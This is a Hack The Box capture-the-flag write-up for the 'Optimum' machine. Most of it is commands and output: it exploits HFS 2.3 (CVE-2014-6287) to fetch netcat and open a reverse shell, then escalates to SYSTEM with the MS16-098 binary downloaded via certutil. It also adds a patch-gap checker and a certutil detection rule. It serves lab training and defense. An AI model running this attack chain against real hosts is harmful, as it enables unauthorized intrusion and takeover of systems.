Enumeration
The initial enumeration phase established that the target, 10.129.89.198, is a Windows machine based on the TTL=127 from the ping command. A full port scan using nmap revealed only port 80 open, running the HttpFileServer httpd 2.3 service. Further detailed scans and whatweb confirmed the presence of HFS 2.3, which strongly suggested a specific attack vector could be available, narrowing down the focus for the next phase.
# Check connection; ttl=127 tells us it's a Windows machine
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ ping -c 1 10.129.89.198
64 bytes from 10.129.89.198: icmp_seq=1 ttl=127 time=97.2 ms
# [-p-] Scan all ports
# [--open] Only show the open ports
# [-n] Do not resolve DNS, to speed up the scan
# [-sS] SYN scan. Do not complete TCP connections
# [-Pn] Skip host discovery and treat the host as up
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ sudo nmap -p- --open -n -sS -Pn --min-rate=5000 10.129.89.198
PORT STATE SERVICE
80/tcp open http
# [-p80] Scan only port 80
# [-sCV] Service version detection & Run defaults scripts
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ sudo nmap -p80 -sCV 10.129.89.198 -oN target
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
# Get information about the webpage technologies
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ whatweb http://10.129.89.198
[200 OK] Cookies[HFS_SID], Country[RESERVED][ZZ], HTTPServer[HFS 2.3], HttpFileServer, IP[10.129.89.198], JQuery[1.4.4], Script[text/javascript], Title[HFS /]
Exploitation
The exploitation phase began by using searchsploit to find known vulnerabilities for HFS 2.3. The search yielded several options, with the Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) exploit (EDB ID 39161) being chosen. This exploit requires hosting a copy of Netcat for Windows (renamed to nc.exe) on a local HTTP server. After setting up a Python HTTP server on port 80 and a Netcat listener on port 443, the Python 2 exploit script was executed. Although it initially failed, a second run successfully executed the remote command, downloading and running nc.exe on the target to establish a reverse shell, granting access as the low-privileged user kostas.
# Searching exploits for HFS v2.3
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ searchsploit HFS 2.3
----------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------- ---------------------------------
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3) | windows/remote/49584.py
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
----------------------------------------------------------------------------------------------------------- ---------------------------------
# [-x] View the source code of the script
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ searchsploit -x windows/remote/39161.py
# Notes from the creator:
# Usage : python Exploit.py <Target IP address> <Target Port Number>
# EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
# [-m] Copy the script to the current directory
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ searchsploit -m windows/remote/39161.py
Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
URL: https://www.exploit-db.com/exploits/39161
Path: /usr/share/exploitdb/exploits/windows/remote/39161.py
Codes: CVE-2014-6287, OSVDB-111386
Verified: True
File Type: Python script, ASCII text executable, with very long lines (540)
Copied to: /home/kali/htb/optimum/39161.py
# Change the local IP address value in the source code
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ nano 39161.py # ip_addr = "10.10.14.84"
# Download netcat for Windows from the nmap website
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip
# [-j] Junk paths. Do not create a new directory to extract the files
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ unzip -j ncat-portable-5.59BETA1.zip
# Extracted files are in the working directory
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ ls -l
-rwxr-xr-x 1 kali kali 1667584 Jun 30 2011 ncat.exe
-rw-rw-r-- 1 kali kali 666933 Jun 30 2011 ncat-portable-5.59BETA1.zip
-rw-rw-r-- 1 kali kali 640 Jun 30 2011 README
# Rename the file because the script will look for "nc.exe"
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ mv ncat.exe nc.exe
# Create a simple http server with python
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
# Listen for the reverse shell on port 443
# [-l] Listen mode. Waiting for an incoming connection
# [-v] Output verbosity
# [-n] Disables DNS resolution
# [-p] Specifies the port number to listen on or connect to
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ nc -lvnp 443
# Run the script using python2
# python2 39161.py <target_ip> <target_port>
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python2 39161.py 10.129.89.198 80
# The script retrieved the netcat file from the server but did not open a shell to my listener. Let's run it again
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python2 39161.py 10.129.89.198 80
# We got access with the user kostas
C:\Users\kostas\Desktop>whoami
optimum\kostas
# The user flag is in "C:\Users\kostas\Desktop\user.txt"
C:\Users\kostas\Desktop>type user.txt
66*****************************ff
Privilege Escalation
For privilege escalation, the systeminfo command was executed on the target, and its output was saved locally. This data was then fed into the Windows-Exploit-Suggester-python3 tool, which compares system patch levels against a database of known vulnerabilities. The tool suggested the exploit for MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) (EDB ID 41020). The associated binary exploit, 41020.exe, was downloaded from Exploit-DB’s binary repository, transferred to the target machine via a Python HTTP server and certutil, and then executed. Running the exploit successfully escalated privileges from the kostas user to NT AUTHORITY\SYSTEM, allowing for the retrieval of the final root flag.
# Copy all the information retrieved from the machine to a file on your machine, e.g. "systeminfo.txt"
C:\Users\kostas\Desktop>systeminfo
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ nano systeminfo.txt
# Cloning the windows-exploit-suggester repository for python3
# Original repo: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ git clone https://github.com/Pwnistry/Windows-Exploit-Suggester-python3
# [-u] Update database
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python3 windows-exploit-suggester.py -u
[*] initiating winsploit version 3.4...
[+] writing to file 2025-10-23-mssb.xlsx
[*] done
# [-d] Database file
# [-i] Systeminfo file
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python3 windows-exploit-suggester.py -d 2025-10-23-mssb.xlsx -i systeminfo.txt
[*] initiating winsploit version 3.4...
[*] querying database file for potential vulnerabilities
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
...
...
...
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
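The suggester's core check, reduced to its essentials as an added example (not the Windows-Exploit-Suggester code): parse the hotfix list from systeminfo output and report bulletins whose fixing KB is absent. The systeminfo sample is constructed, and the bulletin table is a constructed subset in which MS16-098 / KB3178466 is the entry from the run above.

```python
import re

# Constructed sample of "systeminfo" output (not the target's real data);
# only the fields this check reads are included.
SAMPLE_SYSTEMINFO = """\
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3139914
"""

# Constructed subset of a bulletin -> fixing-KB table. MS16-098 (KB3178466)
# is the bulletin flagged in the run above; the other two are further
# well-known kernel/LPE bulletins added for illustration.
BULLETIN_KB = {
    "MS16-098": "KB3178466",  # Windows Kernel-Mode Drivers (RGNOBJ)
    "MS16-032": "KB3139914",  # Secondary Logon
    "MS15-051": "KB3057191",  # Win32k
}

HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
FIELD_RE = re.compile(r"^(OS Name|OS Version|System Type):\s*(.+)$", re.MULTILINE)

def parse_systeminfo(text):
    """Return (fields, installed_kbs) from raw systeminfo output."""
    fields = {k: v.strip() for k, v in FIELD_RE.findall(text)}
    kbs = {kb.upper() for kb in HOTFIX_RE.findall(text)}
    return fields, kbs

def missing_bulletins(text, table=BULLETIN_KB):
    """List bulletins whose fixing KB does not appear in the hotfix list.

    Simplification: supersedence is not modelled, so a later cumulative
    rollup can make a 'missing' KB a false positive. Treat hits as leads
    to verify against the actual build, not as proof of exposure.
    """
    _, installed = parse_systeminfo(text)
    return sorted(b for b, kb in table.items() if kb.upper() not in installed)

if __name__ == "__main__":
    fields, kbs = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(fields["OS Name"], fields["OS Version"], "| hotfixes:", sorted(kbs))
    print("bulletins with no fixing KB installed:", missing_bulletins(SAMPLE_SYSTEMINFO))
```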
# Download binary from exploitdb-bin-sploits for the exploit above
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41020.exe
# Create an http server with python to transfer the binary to the Windows Server machine
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python3 -m http.server 80
C:\Users\kostas\Desktop>cd C:\Windows\Temp
C:\Windows\Temp>mkdir Privesc
C:\Windows\Temp>cd Privesc
# Getting the binary from the http server
# Command: certutil -f -urlcache -split http://<server_ip>/<server_file> <output_file_name>
# [-f] Force flag. Overwrite if the file already exists
# [-urlcache] Manipulating the URL cache, which includes the function to download files from a specified URL.
# [-split] This is a modifier for the "-urlcache" command that tells certutil to save the output file to disk
C:\Windows\Temp\Privesc>certutil -f -urlcache -split http://10.10.14.84/41020.exe exploit.exe
CertUtil: -URLCache command completed successfully.
# Run the exploit
C:\Windows\Temp\Privesc>exploit.exe
# We got Administrator access
C:\Windows\Temp\Privesc>whoami
nt authority\system
# Root flag in "C:\Users\Administrator\Desktop"
C:\Windows\Temp\Privesc>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
09*****************************e7
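From the defender's side, the certutil -urlcache -split transfer used above is a well-known living-off-the-land download pattern that process-creation telemetry can catch. The following is an added example (not part of this write-up or any product): it runs a simple detection over constructed events shaped like Windows 4688 / Sysmon ID 1 records; the third event mirrors the command shown above.

```python
import re

# Constructed process-creation events (not real telemetry). The third one
# mirrors the certutil transfer shown in the privilege-escalation steps.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -hashfile C:\\Users\\alice\\setup.msi SHA256"},
    {"host": "WS02", "user": "CORP\\bob", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -encode secrets.txt out.b64"},
    {"host": "OPTIMUM", "user": "optimum\\kostas", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -f -urlcache -split http://10.10.14.84/41020.exe exploit.exe"},
    {"host": "SRV03", "user": "CORP\\svc", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir"},
]

URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)

def certutil_download_finding(event):
    """Return a finding dict if the event is a certutil -urlcache fetch, else None."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image != "certutil.exe":
        return None
    # certutil accepts both "-flag" and "/flag"; normalise before comparing.
    tokens = [t.lstrip("-/").lower() if t[:1] in "-/" else t
              for t in event["cmdline"].split()]
    if "urlcache" not in tokens:
        return None
    url = URL_RE.search(event["cmdline"])
    if not url:
        return None  # cache housekeeping with no remote URL is not a download
    # -split writes the fetched content to disk and -f overwrites: both mark
    # a deliberate file drop rather than a mere cache lookup.
    sev = "high" if "split" in tokens or "f" in tokens else "medium"
    return {"host": event["host"], "user": event["user"], "url": url.group(0),
            "severity": sev, "rule": "certutil -urlcache remote fetch"}

def scan_events(events):
    """Apply the rule to every event and keep only the hits."""
    return [f for f in (certutil_download_finding(e) for e in events) if f]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

A production rule would additionally correlate the drop with the file-create event and the subsequent execution of the written file from the same directory.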